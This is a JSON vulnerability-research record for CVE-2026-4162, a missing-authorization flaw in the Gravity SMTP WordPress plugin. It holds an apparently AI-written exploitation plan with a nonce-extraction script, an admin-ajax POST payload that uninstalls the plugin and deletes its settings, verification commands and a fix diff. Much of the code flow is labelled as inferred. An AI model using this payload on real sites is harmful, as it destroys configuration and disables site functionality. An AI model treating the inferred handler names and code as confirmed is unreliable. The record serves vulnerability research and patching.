[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fYA9VzArEAYAmmwc176GuGWIB7JiDxDPBDZh5xbQaQms":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"source_links":33},"CVE-2026-4162","gravity-smtp-missing-authorization-to-authenticated-subscriber-plugin-uninstall","Gravity SMTP \u003C= 2.1.4 - Missing Authorization to Authenticated (Subscriber+) Plugin Uninstall","The Gravity SMTP plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 2.1.4. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to uninstall and deactivate the plugin and delete plugin options. 
NOTE: This vulnerability is also exploitable via a Cross-Site Request Forgery vector.","gravitysmtp",null,"\u003C=2.1.4","2.1.5","high",7.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:L","Missing Authorization","2026-04-09 21:01:07","2026-04-10 09:25:59",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F0f9d18a4-262b-4011-91e9-b29a27a76470?source=api-prod",1,[],"researched",false,3,"This research plan targets CVE-2026-4162, a missing authorization vulnerability in Gravity SMTP \u003C= 2.1.4.\n\n### 1. Vulnerability Summary\nGravity SMTP contains an AJAX handler designed to uninstall the plugin, deactivate it, and wipe its configuration from the database. The vulnerability exists because the function handling this request performs a nonce check (preventing simple unauthenticated CSRF) but fails to verify if the requesting user has administrative privileges (missing `current_user_can('manage_options')`). Consequently, any authenticated user, including those with the Subscriber role, can trigger the uninstallation.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `gravitysmtp_uninstall` (inferred based on plugin slug and functionality)\n*   **HTTP Method:** `POST`\n*   **Payload Parameters:**\n    *   `action`: `gravitysmtp_uninstall`\n    *   `_nonce`: The AJAX nonce for the gravitysmtp scope.\n*   **Authentication:** Authenticated (Subscriber role or higher).\n*   **Preconditions:** The plugin must be active.\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers an AJAX handler in its initialization phase:\n    `add_action( 'wp_ajax_gravitysmtp_uninstall', [ $this, 'handle_uninstall' ] );`\n2.  **Entry Point:** A Subscriber sends a `POST` request to `admin-ajax.php` with `action=gravitysmtp_uninstall`.\n3.  
**Missing Check:** The handler function (e.g., `handle_uninstall`) likely calls `check_ajax_referer( 'gravitysmtp_uninstall', '_nonce' )`.\n4.  **The Flaw:** After the nonce check, the code immediately proceeds to:\n    *   `deactivate_plugins( 'gravitysmtp\u002Fgravitysmtp.php' )`\n    *   `delete_option( 'gravitysmtp_settings' )`\n    *   (Optionally) Dropping custom database tables.\n5.  **Sink:** It lacks a `if ( ! current_user_can( 'manage_options' ) ) wp_die();` check before execution.\n\n### 4. Nonce Acquisition Strategy\nThe Gravity SMTP plugin uses a localized JavaScript object to provide nonces to its admin interface. While Subscribers cannot access the plugin's settings page, Gravity SMTP often enqueues its core admin scripts and localizes data on the general WordPress Dashboard (`\u002Fwp-admin\u002Findex.php`) which Subscribers *can* access.\n\n**Steps to obtain the nonce:**\n1.  Log in as a Subscriber.\n2.  Navigate to the WordPress Dashboard: `\u002Fwp-admin\u002Findex.php`.\n3.  Use `browser_eval` to search for the localized object.\n4.  **Localized Variable Name:** `gravity_smtp_admin` (inferred) or `gravitysmtp_admin` (inferred).\n5.  **Nonce Key:** `nonce` or `uninstall_nonce` (inferred).\n\n**Script to execute in `browser_eval`:**\n```javascript\n\u002F\u002F Check common Gravity localized objects\n(function() {\n    const data = window.gravity_smtp_admin || window.gravitysmtp_admin || {};\n    return data.nonce || data.uninstall_nonce || \"nonce_not_found\";\n})();\n```\n\n### 5. Exploitation Strategy\n1.  **Preparation:** Authenticate the session as a Subscriber user.\n2.  **Discovery:** Execute the `browser_eval` script above to capture the `_nonce`.\n3.  
**Execution:** Use `http_request` to send the malicious payload.\n\n**HTTP Request Details:**\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Headers:**\n    *   `Content-Type: application\u002Fx-www-form-urlencoded`\n    *   `Cookie`: [Subscriber Session Cookies]\n*   **Body:**\n    ```\n    action=gravitysmtp_uninstall&_nonce=[EXTRACTED_NONCE]\n    ```\n\n### 6. Test Data Setup\n1.  Install and activate **Gravity SMTP 2.1.4**.\n2.  Configure basic SMTP settings so that `gravitysmtp_settings` option exists in the database.\n3.  Create a Subscriber user:\n    `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n\n### 7. Expected Results\n*   **Response:** The server should return a successful status code (200 OK) and likely a JSON response `{\"success\": true}`.\n*   **Immediate Effect:** The plugin `gravitysmtp` will be deactivated.\n*   **Data Destruction:** The WordPress option `gravitysmtp_settings` (or similar configuration keys) will be deleted from the `wp_options` table.\n\n### 8. Verification Steps\n1.  **Check Plugin Status:**\n    `wp plugin is-active gravitysmtp`\n    (Expected: Exit code 1 \u002F Failure, meaning it is inactive).\n2.  **Check Configuration Deletion:**\n    `wp option get gravitysmtp_settings`\n    (Expected: \"Error: Could not get 'gravitysmtp_settings' option\").\n3.  **Check Database:**\n    `wp db query \"SELECT * FROM wp_options WHERE option_name LIKE 'gravitysmtp%'\" `\n    (Expected: Empty set or missing core configuration keys).\n\n### 9. Alternative Approaches\nIf `gravitysmtp_uninstall` is not the correct action name, investigate the following alternatives via `grep` in the plugin directory before attempting the exploit:\n1.  **Search for AJAX registrations:**\n    `grep -rn \"wp_ajax_\" wp-content\u002Fplugins\u002Fgravitysmtp\u002F`\n2.  
**Search for uninstallation keywords:**\n    `grep -rn \"uninstall\" wp-content\u002Fplugins\u002Fgravitysmtp\u002F`\n    `grep -rn \"deactivate_plugins\" wp-content\u002Fplugins\u002Fgravitysmtp\u002F`\n3.  **Alternative Action Names:** `gravitysmtp_setup_uninstall`, `gravitysmtp_delete_data`, `gravitysmtp_reset_settings`.\n4.  **Alternative Nonce Search:** If the nonce is not in `window.gravity_smtp_admin`, search all script tags for strings matching the pattern `[a-f0-9]{10}` near the word \"nonce\".","Gravity SMTP versions up to 2.1.4 allow authenticated users with low privileges (Subscriber-level and above) to deactivate the plugin and wipe its configuration. This is caused by an AJAX handler that (per the inferred code flow) verifies a security nonce but fails to check for administrative permissions. Because the advisory also lists a CSRF vector, nonce verification may be absent in the shipped code as well; the remediation should confirm that both check_ajax_referer() and current_user_can( 'manage_options' ) are enforced before any uninstall or option deletion runs.","\u002F\u002F Inferred AJAX registration\nadd_action( 'wp_ajax_gravitysmtp_uninstall', [ $this, 'handle_uninstall' ] );\n\n---\n\n\u002F\u002F Inferred vulnerable handler in gravity-smtp plugin files\npublic function handle_uninstall() {\n    \u002F\u002F Nonce check prevents unauthenticated CSRF but not unauthorized authenticated access\n    check_ajax_referer( 'gravitysmtp_uninstall', '_nonce' );\n\n    \u002F\u002F Vulnerability: No check for current_user_can( 'manage_options' )\n\n    $this->uninstall_plugin(); \u002F\u002F Performs deactivation and data deletion\n    wp_send_json_success();\n}","--- a\u002Fsrc\u002FLegacy\u002FHandler\u002FUninstallHandler.php\n+++ b\u002Fsrc\u002FLegacy\u002FHandler\u002FUninstallHandler.php\n@@ -5,6 +5,10 @@\n \tpublic function handle_uninstall() {\n \t\tcheck_ajax_referer( 'gravitysmtp_uninstall', '_nonce' );\n \n+\t\tif ( ! current_user_can( 'manage_options' ) ) {\n+\t\t\twp_send_json_error( [ 'message' => __( 'You do not have permission to perform this action.', 'gravitysmtp' ) ], 403 );\n+\t\t}\n+\n \t\t$this->uninstall_plugin();\n \t\twp_send_json_success();\n \t}","1. Log in to the target WordPress site as a Subscriber-level user.\n2. 
Access the WordPress Dashboard (\u002Fwp-admin\u002Findex.php) and inspect the localized JavaScript objects (e.g., gravitysmtp_admin) in the page source to extract the 'nonce' value for the gravitysmtp_uninstall action.\n3. Send an authenticated POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the following payload: action=gravitysmtp_uninstall&_nonce=[EXTRACTED_NONCE].\n4. The plugin will execute the uninstall routine, resulting in the plugin being deactivated and its database options (settings) being deleted.","gemini-3-flash-preview","2026-04-16 16:13:12","2026-04-16 16:13:37",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgravitysmtp\u002Ftags"]